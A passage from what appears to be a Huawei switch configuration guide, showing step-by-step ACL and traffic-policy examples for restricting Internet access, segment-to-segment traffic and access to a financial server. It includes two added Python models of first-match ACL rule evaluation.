[Switch] traffic behavior tb1 //Create a traffic behavior.
[Switch-behavior-tb1] quit

Step 6 Configure the traffic policy.


# Define the traffic policy and associate the traffic classifier and traffic behavior with the
traffic policy.
[Switch] traffic policy tp1 //Create a traffic policy.
[Switch-trafficpolicy-tp1] classifier tc1 behavior tb1 //Associate the traffic
classifier tc1 with the traffic behavior tb1.
[Switch-trafficpolicy-tp1] quit

Step 7 Apply the traffic policy to an interface.


# Packets from internal hosts are forwarded to the Internet through GE2/0/1; therefore, apply
the traffic policy tp1 to the outbound direction of GE2/0/1.
[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] traffic-policy tp1 outbound //Apply the traffic
policy to the outbound direction of an interface.
[Switch-GigabitEthernet2/0/1] quit

Step 8 Verify the configuration.


# Check the configuration of ACL rules.
[Switch] display acl 2001
Basic ACL 2001, 3 rules
Acl's step is 5
rule 5 permit source 10.1.1.11 0 (match-counter 0)
rule 10 permit source 10.1.2.12 0 (match-counter 0)
rule 15 deny time-range rest-time(match-counter 0) (Inactive)

# Check the configuration of the traffic classifier.


[Switch] display traffic classifier user-defined
User Defined Classifier Information:
Classifier: tc1
Precedence: 5
Operator: OR
Rule(s) : if-match acl 2001

Total classifier number is 1

# Check the configuration of the traffic policy.


[Switch] display traffic policy user-defined tp1
User Defined Traffic Policy Information:
Policy: tp1
Classifier: tc1
Operator: OR
Behavior: tb1
Permit

# Only the managers (10.1.1.11 and 10.1.2.12) of R&D and marketing departments can access
the Internet on Saturday and Sunday.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
time-range rest-time 00:00 to 23:59 off-day
#
acl number 2001
rule 5 permit source 10.1.1.11 0
rule 10 permit source 10.1.2.12 0
rule 15 deny time-range rest-time
#
traffic classifier tc1 operator or precedence 5
if-match acl 2001
#
traffic behavior tb1
permit
#
traffic policy tp1 match-order config


classifier tc1 behavior tb1


#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif20
ip address 10.1.2.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 10 20
traffic-policy tp1 outbound
#
return

12.1.6 Example for Using ACLs to Restrict Mutual Access Between Network Segments

ACL Overview
An Access Control List (ACL) consists of one rule or a set of rules that describe the packet
matching conditions. These conditions include source addresses, destination addresses, and
port numbers of packets.
An ACL is a packet filter that filters packets based on rules. A device with an ACL
configured matches packets based on the rules to obtain the packets of a certain type, and then
decides to forward or discard these packets according to the policies used by the service
module to which the ACL is applied.
Depending on the rule definition methods, ACLs include basic ACL, advanced ACL, and
Layer 2 ACL. An advanced ACL defines rules to filter IPv4 packets based on source IP
addresses, destination addresses, IP protocol types, TCP source/destination port numbers,
UDP source/destination port numbers, fragment information, and time ranges. Compared with
a basic ACL, an advanced ACL is more accurate, flexible, and provides more functions. For
example, if you want to filter packets based on source and destination IP addresses, configure
an advanced ACL.
In this example, advanced ACLs are applied to the traffic policy module so that the device can
filter the packets between different network segments and thus restrict mutual access between
network segments.

Configuration Notes
This example applies to all versions and models.

Networking Requirements
As shown in Figure 12-6, the departments of an enterprise are connected through the Switch. To
facilitate network management, the administrator allocates the IP addresses on two network
segments to the R&D and marketing departments respectively. In addition, the administrator
adds the two departments to different VLANs for broadcast domain isolation. The Switch
needs to restrict mutual access between the two network segments to ensure information security.

Figure 12-6 Using advanced ACLs to restrict mutual access between network segments
[Figure: LAN Switch A (VLAN 10; R&D: 10.1.1.0/24) -- GE1/0/1 (VLANIF 10, 10.1.1.1/24) -- Switch -- GE2/0/1 -- Router -- Internet; LAN Switch B (VLAN 20; Marketing: 10.1.2.0/24) -- GE1/0/2 (VLANIF 20, 10.1.2.1/24) -- Switch]

Configuration Roadmap
The following configurations are performed on the Switch. The configuration roadmap is as
follows:
1. Configure an advanced ACL and ACL-based traffic classifier to filter the packets
exchanged between R&D and marketing departments.
2. Configure a traffic behavior to discard the packets matching the ACL.
3. Configure and apply a traffic policy to make the ACL and traffic behavior take effect.

Procedure
Step 1 Configure VLANs and IP addresses for interfaces.
# Create VLAN 10 and VLAN 20.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20

# Configure GE1/0/1 and GE1/0/2 of the Switch as trunk interfaces and add them to VLAN
10 and VLAN 20 respectively.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type trunk
[Switch-GigabitEthernet1/0/2] port trunk allow-pass vlan 20
[Switch-GigabitEthernet1/0/2] quit

# Create VLANIF 10 and VLANIF 20 and assign IP addresses to them.


[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.1.1.1 24
[Switch-Vlanif10] quit
[Switch] interface vlanif 20


[Switch-Vlanif20] ip address 10.1.2.1 24


[Switch-Vlanif20] quit

Step 2 Configure ACLs.


# Create advanced ACL 3001 and configure rules for the ACL to block the packets from the
R&D department to the marketing department.
[Switch] acl 3001
[Switch-acl-adv-3001] rule deny ip source 10.1.1.0 0.0.0.255 destination 10.1.2.0
0.0.0.255 //Prevent the R&D department from accessing the marketing department.
[Switch-acl-adv-3001] quit

# Create advanced ACL 3002 and configure rules for the ACL to block the packets from the
marketing department to the R&D department.
[Switch] acl 3002
[Switch-acl-adv-3002] rule deny ip source 10.1.2.0 0.0.0.255 destination 10.1.1.0
0.0.0.255 //Prevent the marketing department from accessing the R&D department.
[Switch-acl-adv-3002] quit

Step 3 Configure the advanced ACL-based traffic classifier.


# Configure the traffic classifier tc1 to classify packets that match ACL 3001 and ACL 3002.
[Switch] traffic classifier tc1 //Create a traffic classifier.
[Switch-classifier-tc1] if-match acl 3001 //Associate an ACL with the traffic
classifier.
[Switch-classifier-tc1] if-match acl 3002 //Associate an ACL with the traffic
classifier.
[Switch-classifier-tc1] quit

Step 4 Configure the traffic behavior.


# Configure the traffic behavior tb1 to reject packets.
[Switch] traffic behavior tb1 //Create a traffic behavior.
[Switch-behavior-tb1] deny //Set the action of the traffic behavior to deny.
[Switch-behavior-tb1] quit

Step 5 Configure the traffic policy.


# Define the traffic policy and associate the traffic classifier and traffic behavior with the
traffic policy.
[Switch] traffic policy tp1 //Create a traffic policy.
[Switch-trafficpolicy-tp1] classifier tc1 behavior tb1 //Associate the traffic
classifier tc1 with the traffic behavior tb1.
[Switch-trafficpolicy-tp1] quit

Step 6 Apply the traffic policy to an interface.


# The packets from the R&D and marketing departments are received by GE1/0/1 and
GE1/0/2 respectively; therefore, apply the traffic policy to the inbound direction of GE1/0/1
and GE1/0/2.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] traffic-policy tp1 inbound //Apply the traffic
policy to the inbound direction of an interface.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] traffic-policy tp1 inbound //Apply the traffic
policy to the inbound direction of an interface.
[Switch-GigabitEthernet1/0/2] quit

Step 7 Verify the configuration.


# Check the configuration of ACL rules.


[Switch] display acl 3001


Advanced ACL 3001, 1 rule
Acl's step is 5
rule 5 deny ip source 10.1.1.0 0.0.0.255 destination 10.1.2.0 0.0.0.255 (match-
counter 0)
[Switch] display acl 3002
Advanced ACL 3002, 1 rule
Acl's step is 5
rule 5 deny ip source 10.1.2.0 0.0.0.255 destination 10.1.1.0 0.0.0.255 (match-
counter 0)

# Check the configuration of the traffic classifier.


[Switch] display traffic classifier user-defined
User Defined Classifier Information:
Classifier: tc1
Precedence: 5
Operator: OR
Rule(s) : if-match acl 3001
if-match acl 3002

Total classifier number is 1

# Check the configuration of the traffic policy.


[Switch] display traffic policy user-defined tp1
User Defined Traffic Policy Information:
Policy: tp1
Classifier: tc1
Operator: OR
Behavior: tb1
Deny

# The two network segments where the R&D and marketing departments reside cannot access
each other.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
acl number 3001
rule 5 deny ip source 10.1.1.0 0.0.0.255 destination 10.1.2.0 0.0.0.255
acl number 3002
rule 5 deny ip source 10.1.2.0 0.0.0.255 destination 10.1.1.0 0.0.0.255
#
traffic classifier tc1 operator or precedence 5
if-match acl 3001
if-match acl 3002
#
traffic behavior tb1
deny
#
traffic policy tp1 match-order config
classifier tc1 behavior tb1
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif20
ip address 10.1.2.1 255.255.255.0
#


interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
traffic-policy tp1 inbound
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
traffic-policy tp1 inbound
#
return
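The rule evaluation used in sections 12.1.5 and 12.1.6, as an added example that is not Huawei code: a first-match evaluator for basic and advanced ACL rules with wildcard masks and a periodic time range, applied through a classifier/behavior pair the way the traffic policies in these two examples apply them. It assumes that a packet matching no rule is not handled by the behavior and is forwarded normally, that a deny in either the matched rule or the behavior drops the packet (the NOTE in 12.1.5), and that packets are plain dicts with `proto`, `sip` and `dip`; the Internet address 203.0.113.10 and the two test dates are constructed values. The same evaluator also covers the deny-only basic ACL and the permit-then-deny advanced ACL patterns in the following two examples of this chapter.

```python
# Added example, not Huawei code: a first-match evaluator for the ACL rules in
# sections 12.1.5 and 12.1.6, applied the way a traffic policy applies them.
# Assumptions: packets are dicts with proto/sip/dip; a packet that matches no
# rule is not handled by the behavior and is forwarded normally; the Internet
# address 203.0.113.10 and the dates SATURDAY/WEDNESDAY are constructed values.
from dataclasses import dataclass
from datetime import datetime
from ipaddress import IPv4Address
from typing import Optional


def wildcard_match(addr: str, network: str, wildcard: str) -> bool:
    """Wildcard mask as in 'source 10.1.1.0 0.0.0.255': 0 bits must match."""
    a, n, w = (int(IPv4Address(x)) for x in (addr, network, wildcard))
    care = ~w & 0xFFFFFFFF
    return a & care == n & care


@dataclass
class TimeRange:
    """Periodic time range: active on the given weekdays between start and end."""
    start: str           # "HH:MM"
    end: str
    weekdays: frozenset  # datetime.weekday(): Monday=0 ... Sunday=6

    def active(self, when: datetime) -> bool:
        return when.weekday() in self.weekdays and self.start <= when.strftime("%H:%M") <= self.end


ANY = ("0.0.0.0", "255.255.255.255")
OFF_DAY = frozenset({5, 6})  # Saturday and Sunday


@dataclass
class Rule:
    action: str                    # "permit" or "deny"
    proto: Optional[str] = None    # None for a basic ACL; "ip" matches any protocol
    src: tuple = ANY               # (network, wildcard)
    dst: tuple = ANY
    time_range: Optional[TimeRange] = None

    def matches(self, pkt: dict, when: datetime) -> bool:
        if self.time_range and not self.time_range.active(when):
            return False           # rule shows as (Inactive) outside its range
        if self.proto not in (None, "ip") and self.proto != pkt["proto"]:
            return False
        return wildcard_match(pkt["sip"], *self.src) and wildcard_match(pkt["dip"], *self.dst)


def acl_action(rules: list, pkt: dict, when: datetime) -> Optional[str]:
    """Action of the first matching rule in configuration order, else None."""
    return next((r.action for r in rules if r.matches(pkt, when)), None)


def traffic_policy(acls: list, behavior: str, pkt: dict, when: datetime) -> str:
    """Classifier with operator OR over several ACLs. A deny in the matched rule
    or in the behavior drops the packet; permit in both forwards it."""
    for rules in acls:
        action = acl_action(rules, pkt, when)
        if action is not None:
            return "deny" if "deny" in (action, behavior) else "permit"
    return "forward"  # no rule matched: the behavior is not applied


# Section 12.1.5: managers always, everyone else only outside rest-time.
REST_TIME = TimeRange("00:00", "23:59", OFF_DAY)
ACL_2001 = [
    Rule("permit", src=("10.1.1.11", "0.0.0.0")),
    Rule("permit", src=("10.1.2.12", "0.0.0.0")),
    Rule("deny", time_range=REST_TIME),
]
# Section 12.1.6: the R&D and marketing segments may not reach each other.
ACL_3001 = [Rule("deny", "ip", ("10.1.1.0", "0.0.0.255"), ("10.1.2.0", "0.0.0.255"))]
ACL_3002 = [Rule("deny", "ip", ("10.1.2.0", "0.0.0.255"), ("10.1.1.0", "0.0.0.255"))]

SATURDAY = datetime(2016, 10, 29, 10, 0)   # constructed test date (a Saturday)
WEDNESDAY = datetime(2016, 10, 26, 10, 0)  # constructed test date (a Wednesday)


def internet_access(sip: str, when: datetime) -> str:
    """tp1 (classifier tc1 -> permit) outbound on GE2/0/1, as in 12.1.5."""
    pkt = {"proto": "tcp", "sip": sip, "dip": "203.0.113.10"}  # constructed address
    return traffic_policy([ACL_2001], "permit", pkt, when)


def segment_access(sip: str, dip: str) -> str:
    """tp1 (classifier tc1 -> deny) inbound on GE1/0/1 and GE1/0/2, as in 12.1.6."""
    pkt = {"proto": "tcp", "sip": sip, "dip": dip}
    return traffic_policy([ACL_3001, ACL_3002], "deny", pkt, WEDNESDAY)


if __name__ == "__main__":
    print(internet_access("10.1.1.11", SATURDAY), internet_access("10.1.1.20", SATURDAY),
          internet_access("10.1.1.20", WEDNESDAY))
    print(segment_access("10.1.1.5", "10.1.2.7"), segment_access("10.1.1.5", "203.0.113.10"))
```

Two details worth checking against a real configuration: rule order matters, because the managers' permit rules in ACL 2001 are evaluated before the time-based deny and would be overridden if placed after it; and on weekdays the deny rule is inactive, so ordinary employees' packets match no rule at all and are forwarded without the policy being applied rather than being explicitly permitted.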

Related Content
Videos
Configure ACL

12.1.7 Example for Using an ACL to Prevent Internal Hosts from Accessing the Internet

ACL Overview
An Access Control List (ACL) consists of one rule or a set of rules that describe the packet
matching conditions. These conditions include source addresses, destination addresses, and
port numbers of packets.
An ACL is a packet filter that filters packets based on rules. A device with an ACL
configured matches packets based on the rules to obtain the packets of a certain type, and then
decides to forward or discard these packets according to the policies used by the service
module to which the ACL is applied.
Depending on the rule definition methods, ACLs include basic ACL, advanced ACL, and
Layer 2 ACL. A basic ACL defines rules to filter IPv4 packets based on information such as
source IP addresses, fragment information, and time ranges. If you only need to filter packets
based on source IP addresses, you can configure a basic ACL.
In this example, a basic ACL is applied to the traffic policy module so that the device can
filter the packets from internal hosts to the Internet and thus prevent internal hosts from
accessing the Internet.

Configuration Notes
This example applies to all versions and models.

Networking Requirements
As shown in Figure 12-7, the departments of an enterprise are connected through the Switch.
The Switch needs to prevent some hosts of the R&D and marketing departments from
accessing the Internet to protect information security of the enterprise.


Figure 12-7 Using an ACL to prevent internal hosts from accessing the Internet
[Figure: LAN Switch A (VLAN 10; R&D: 10.1.1.0/24; denied IP address: 10.1.1.11) -- GE1/0/1 (VLANIF 10, 10.1.1.1/24) -- Switch -- GE2/0/1 -- Router -- Internet; LAN Switch B (VLAN 20; Marketing: 10.1.2.0/24; denied IP address: 10.1.2.12) -- GE1/0/2 (VLANIF 20, 10.1.2.1/24) -- Switch]

Configuration Roadmap
The following configurations are performed on the Switch. The configuration roadmap is as
follows:
1. Configure a basic ACL and ACL-based traffic classifier to filter packets from the
specified hosts of the R&D and marketing departments.
2. Configure a traffic behavior to discard the packets matching the ACL.
3. Configure and apply a traffic policy to make the ACL and traffic behavior take effect.

Procedure
Step 1 Configure VLANs and IP addresses for interfaces.
# Create VLAN 10 and VLAN 20.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20

# Configure GE1/0/1 and GE1/0/2 of the Switch as trunk interfaces and add them to VLAN
10 and VLAN 20 respectively. Configure GE2/0/1 of the Switch as a trunk interface and add
it to both VLAN 10 and VLAN 20.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type trunk
[Switch-GigabitEthernet1/0/2] port trunk allow-pass vlan 20
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] port link-type trunk
[Switch-GigabitEthernet2/0/1] port trunk allow-pass vlan 10 20
[Switch-GigabitEthernet2/0/1] quit

# Create VLANIF 10 and VLANIF 20 and assign IP addresses to them.


[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.1.1.1 24


[Switch-Vlanif10] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 10.1.2.1 24
[Switch-Vlanif20] quit

Step 2 Configure an ACL.


# Create basic ACL 2001 and configure rules to reject the packets from hosts 10.1.1.11 and
10.1.2.12.
[Switch] acl 2001
[Switch-acl-basic-2001] rule deny source 10.1.1.11 0 //Prevent the host with IP
address 10.1.1.11 from accessing the Internet.
[Switch-acl-basic-2001] rule deny source 10.1.2.12 0 //Prevent the host with IP
address 10.1.2.12 from accessing the Internet.
[Switch-acl-basic-2001] quit

Step 3 Configure the basic ACL-based traffic classifier.


# Configure the traffic classifier tc1 to classify packets that match ACL 2001.
[Switch] traffic classifier tc1 //Create a traffic classifier.
[Switch-classifier-tc1] if-match acl 2001 //Associate an ACL with the traffic
classifier.
[Switch-classifier-tc1] quit

Step 4 Configure the traffic behavior.


# Configure the traffic behavior tb1 to reject packets.
[Switch] traffic behavior tb1 //Create a traffic behavior.
[Switch-behavior-tb1] deny //Set the action of the traffic behavior to deny.
[Switch-behavior-tb1] quit

Step 5 Configure the traffic policy.


# Define the traffic policy and associate the traffic classifier and traffic behavior with the
traffic policy.
[Switch] traffic policy tp1 //Create a traffic policy.
[Switch-trafficpolicy-tp1] classifier tc1 behavior tb1 //Associate the traffic
classifier tc1 with the traffic behavior tb1.
[Switch-trafficpolicy-tp1] quit

Step 6 Apply the traffic policy to an interface.


# Packets from internal hosts are forwarded to the Internet through GE2/0/1; therefore, apply
the traffic policy to the outbound direction of GE2/0/1.
[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] traffic-policy tp1 outbound //Apply the traffic
policy to the outbound direction of an interface.
[Switch-GigabitEthernet2/0/1] quit

Step 7 Verify the configuration.


# Check the configuration of ACL rules.
[Switch] display acl 2001
Basic ACL 2001, 2 rules
Acl's step is 5
rule 5 deny source 10.1.1.11 0 (match-counter 0)
rule 10 deny source 10.1.2.12 0 (match-counter 0)

# Check the configuration of the traffic classifier.


[Switch] display traffic classifier user-defined
User Defined Classifier Information:


Classifier: tc1
Precedence: 5
Operator: OR
Rule(s) : if-match acl 2001

Total classifier number is 1

# Check the configuration of the traffic policy.


[Switch] display traffic policy user-defined tp1
User Defined Traffic Policy Information:
Policy: tp1
Classifier: tc1
Operator: OR
Behavior: tb1
Deny

# Hosts 10.1.1.11 and 10.1.2.12 cannot access the Internet.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
acl number 2001
rule 5 deny source 10.1.1.11 0
rule 10 deny source 10.1.2.12 0
#
traffic classifier tc1 operator or precedence 5
if-match acl 2001
#
traffic behavior tb1
deny
#
traffic policy tp1 match-order config
classifier tc1 behavior tb1
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif20
ip address 10.1.2.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 10 20
traffic-policy tp1 outbound
#
return

12.1.8 Example for Using an ACL to Prevent External Hosts from Accessing Internal Servers


ACL Overview
An Access Control List (ACL) consists of one rule or a set of rules that describe the packet
matching conditions. These conditions include source addresses, destination addresses, and
port numbers of packets.

An ACL is a packet filter that filters packets based on rules. A device with an ACL
configured matches packets based on the rules to obtain the packets of a certain type, and then
decides to forward or discard these packets according to the policies used by the service
module to which the ACL is applied.

Depending on the rule definition methods, ACLs include basic ACL, advanced ACL, and
Layer 2 ACL. An advanced ACL defines rules to filter IPv4 packets based on source IP
addresses, destination addresses, IP protocol types, TCP source/destination port numbers,
UDP source/destination port numbers, fragment information, and time ranges. Compared with
a basic ACL, an advanced ACL is more accurate, flexible, and provides more functions. For
example, if you want to filter packets based on source and destination IP addresses, configure
an advanced ACL.

In this example, an advanced ACL is applied to the traffic policy module so that the device
can filter the packets from external hosts to internal servers and thus restrict access of external
hosts to internal servers.

Configuration Notes
This example applies to all versions and models.

Networking Requirements
As shown in Figure 12-8, the departments of an enterprise are connected through the Switch.
The enterprise allows only internal hosts to access the financial server, but prevents external
hosts from accessing the server.

Figure 12-8 Using an ACL to prevent external hosts from accessing internal servers
[Figure: LAN Switch A (VLAN 10; President office: 10.164.1.0/24) -- GE1/0/1 (VLANIF 10, 10.164.1.1/24) -- Switch; LAN Switch B (VLAN 20; Marketing: 10.164.2.0/24) -- GE1/0/2 (VLANIF 20, 10.164.2.1/24) -- Switch; LAN Switch C (VLAN 30; R&D: 10.164.3.0/24) -- GE1/0/3 (VLANIF 30, 10.164.3.1/24) -- Switch; Switch GE2/0/1 (VLANIF 100, 10.164.4.1/24) -- Financial server 10.164.4.4/24 and Router -- Internet]


Configuration Roadmap
The following configurations are performed on the Switch. The configuration roadmap is as
follows:
1. Configure an advanced ACL and ACL-based traffic classifier to filter the packets from
external hosts to the financial server and thus prevent external hosts from accessing this
server.
2. Configure a traffic behavior to permit the packets that match the ACL permit rule.
3. Configure and apply a traffic policy to make the ACL and traffic behavior take effect.

Procedure
Step 1 Add interfaces to VLANs and assign IP addresses to the VLANIF interfaces.

# Add GE1/0/1 through GE1/0/3 to VLANs 10, 20, and 30 respectively, add GE2/0/1 to
VLAN 100, and assign IP addresses to the VLANIF interfaces. The configurations on GE1/0/1
and VLANIF 10 are shown as an example; GE1/0/2, GE1/0/3, and GE2/0/1 are configured in
the same way as GE1/0/1, and VLANIF 20, VLANIF 30, and VLANIF 100 in the same way as
VLANIF 10.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20 30 100
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.164.1.1 255.255.255.0
[Switch-Vlanif10] quit

Step 2 Configure an ACL.

# Create advanced ACL 3002 and configure rules to allow the packets from the president
office, R&D department, and marketing department to reach the financial server and block the
packets from external hosts to the financial server.
[Switch] acl 3002
[Switch-acl-adv-3002] rule permit ip source 10.164.1.0 0.0.0.255 destination
10.164.4.4 0.0.0.0 //Allow the president office to access the financial server.
[Switch-acl-adv-3002] rule permit ip source 10.164.2.0 0.0.0.255 destination
10.164.4.4 0.0.0.0 //Allow the marketing department to access the financial
server.
[Switch-acl-adv-3002] rule permit ip source 10.164.3.0 0.0.0.255 destination
10.164.4.4 0.0.0.0 //Allow the R&D department to access the financial server.
[Switch-acl-adv-3002] rule deny ip destination 10.164.4.4 0.0.0.0 //Prevent
other users from accessing the financial server.
[Switch-acl-adv-3002] quit

Step 3 Configure an ACL-based traffic classifier.

# Configure the traffic classifier c_network to classify the packets that match ACL 3002.
[Switch] traffic classifier c_network //Create a traffic classifier.
[Switch-classifier-c_network] if-match acl 3002 //Associate the ACL with the traffic classifier.
[Switch-classifier-c_network] quit

Step 4 Configure a traffic behavior.

# Configure the traffic behavior b_network and set the action to permit (default value).

NOTE

The permit action in the traffic behavior does not override the ACL. A packet that matches ACL 3002 is discarded if either the matching ACL rule or the traffic behavior is deny, so packets that hit rule 20 are still dropped with the permit behavior configured here. Packets that match no rule of ACL 3002 (for example, traffic to hosts other than 10.164.4.4) are not classified by c_network, so the traffic policy does not apply to them and they are forwarded normally.
[Switch] traffic behavior b_network //Create a traffic behavior. The action is permit by default.
[Switch-behavior-b_network] quit

Step 5 Configure the traffic policy.


# Configure the traffic policy p_network and associate the traffic classifier c_network and
the traffic behavior b_network with the traffic policy.
[Switch] traffic policy p_network //Create a traffic policy.
[Switch-trafficpolicy-p_network] classifier c_network behavior b_network //Associate the traffic classifier c_network with the traffic behavior b_network.
[Switch-trafficpolicy-p_network] quit

Step 6 Apply the traffic policy.


# Packets from internal and external hosts are forwarded to the financial server through
GE2/0/1; therefore, apply the traffic policy p_network to the outbound direction of GE2/0/1.
[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] traffic-policy p_network outbound //Apply the traffic policy to the outbound direction of the interface.
[Switch-GigabitEthernet2/0/1] quit

Step 7 Verify the configuration.


# Check the configuration of ACL rules.
[Switch] display acl 3002
Advanced ACL 3002, 4 rules
Acl's step is 5
rule 5 permit ip source 10.164.1.0 0.0.0.255 destination 10.164.4.4 0 (match-counter 0)
rule 10 permit ip source 10.164.2.0 0.0.0.255 destination 10.164.4.4 0 (match-counter 0)
rule 15 permit ip source 10.164.3.0 0.0.0.255 destination 10.164.4.4 0 (match-counter 0)
rule 20 deny ip destination 10.164.4.4 0 (match-counter 0)

# Check the configuration of the traffic classifier.


[Switch] display traffic classifier user-defined
User Defined Classifier Information:
Classifier: c_network
Precedence: 5
Operator: OR
Rule(s) : if-match acl 3002

Total classifier number is 1

# Check the configuration of the traffic policy.


[Switch] display traffic policy user-defined
User Defined Traffic Policy Information:
Policy: p_network
Classifier: c_network
Operator: OR
Behavior: b_network
Permit

Total policy number is 1

# Check the traffic policy application records.


[Switch] display traffic-policy applied-record
#
-------------------------------------------------
Policy Name:   p_network
Policy Index:  0
Classifier:c_network     Behavior:b_network
-------------------------------------------------
*interface GigabitEthernet2/0/1
    traffic-policy p_network outbound
       slot 2    :  success
-------------------------------------------------
Policy total applied times: 1.

# After the configuration, hosts in 10.164.1.0/24, 10.164.2.0/24, and 10.164.3.0/24 can access the financial server (10.164.4.4), and hosts with any other source address cannot. Traffic to other destinations is not affected by the traffic policy.
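To make the matching semantics above concrete, the following Python model (an added illustration, not Huawei code) evaluates ACL 3002 the way the switch does under match-order config: rules in ascending rule number, first match wins, and wildcard masks in which a 1 bit means "do not care". The packet addresses fed to it are constructed for the example; 192.0.2.10 stands in for an external host.

```python
"""Model of advanced ACL 3002 and traffic policy p_network from this example.
Added illustration, not Huawei code. All packets below are constructed."""
from dataclasses import dataclass
from ipaddress import IPv4Address
from typing import List, Optional, Tuple

Match = Optional[Tuple[str, str]]   # (address, wildcard); None means "any"


@dataclass(frozen=True)
class Rule:
    number: int
    action: str          # "permit" or "deny"
    src: Match = None
    dst: Match = None


def wildcard_match(addr: str, base: str, wildcard: str) -> bool:
    """Wildcard (inverse mask) comparison: a 1 bit in the wildcard is ignored.
    0.0.0.0 is an exact host match, 0.0.0.255 covers a /24."""
    a, b, w = (int(IPv4Address(x)) for x in (addr, base, wildcard))
    care = ~w & 0xFFFFFFFF
    return (a & care) == (b & care)


def rule_matches(rule: Rule, src: str, dst: str) -> bool:
    if rule.src is not None and not wildcard_match(src, *rule.src):
        return False
    if rule.dst is not None and not wildcard_match(dst, *rule.dst):
        return False
    return True


def acl_lookup(rules: List[Rule], src: str, dst: str) -> Optional[str]:
    """Action of the first matching rule in rule-number order, or None
    when no rule matches (the packet is then not classified at all)."""
    for rule in sorted(rules, key=lambda r: r.number):
        if rule_matches(rule, src, dst):
            return rule.action
    return None


def policy_forwarding(rules: List[Rule], src: str, dst: str) -> str:
    """Result under p_network, whose behavior is permit: a deny rule still
    drops, a permit rule forwards, and an unmatched packet is left alone by
    the policy and forwarded."""
    return "dropped" if acl_lookup(rules, src, dst) == "deny" else "forwarded"


# The four rules exactly as configured in Step 2 (rule numbers from Step 7).
ACL_3002 = [
    Rule(5, "permit", ("10.164.1.0", "0.0.0.255"), ("10.164.4.4", "0.0.0.0")),
    Rule(10, "permit", ("10.164.2.0", "0.0.0.255"), ("10.164.4.4", "0.0.0.0")),
    Rule(15, "permit", ("10.164.3.0", "0.0.0.255"), ("10.164.4.4", "0.0.0.0")),
    Rule(20, "deny", None, ("10.164.4.4", "0.0.0.0")),
]

if __name__ == "__main__":
    # Constructed packets: president office host, external host, external
    # host to a non-server destination.
    for src, dst in [("10.164.1.25", "10.164.4.4"),
                     ("192.0.2.10", "10.164.4.4"),
                     ("192.0.2.10", "10.164.2.5")]:
        print(f"{src} -> {dst}: rule={acl_lookup(ACL_3002, src, dst)} "
              f"result={policy_forwarding(ACL_3002, src, dst)}")
```

Because evaluation stops at the first match, a deny rule with a lower number than the permit rules (for example, rule 1 deny ip destination 10.164.4.4 0) would block the three departments as well; the rule numbers assigned by the ACL step are what keep the permits ahead of the deny.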

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20 30 100
#
acl number 3002
rule 5 permit ip source 10.164.1.0 0.0.0.255 destination 10.164.4.4 0
rule 10 permit ip source 10.164.2.0 0.0.0.255 destination 10.164.4.4 0
rule 15 permit ip source 10.164.3.0 0.0.0.255 destination 10.164.4.4 0
rule 20 deny ip destination 10.164.4.4 0
#
traffic classifier c_network operator or precedence 5
if-match acl 3002
#
traffic behavior b_network
permit
#
traffic policy p_network match-order config
classifier c_network behavior b_network
#
interface Vlanif10
ip address 10.164.1.1 255.255.255.0
#
interface Vlanif20
ip address 10.164.2.1 255.255.255.0
#
interface Vlanif30
ip address 10.164.3.1 255.255.255.0
#
interface Vlanif100
ip address 10.164.4.1 255.255.255.0


#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 30
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 100
traffic-policy p_network outbound
#
return

12.1.9 Example for Applying ACLs to SNMP to Filter NMSs

ACL Overview
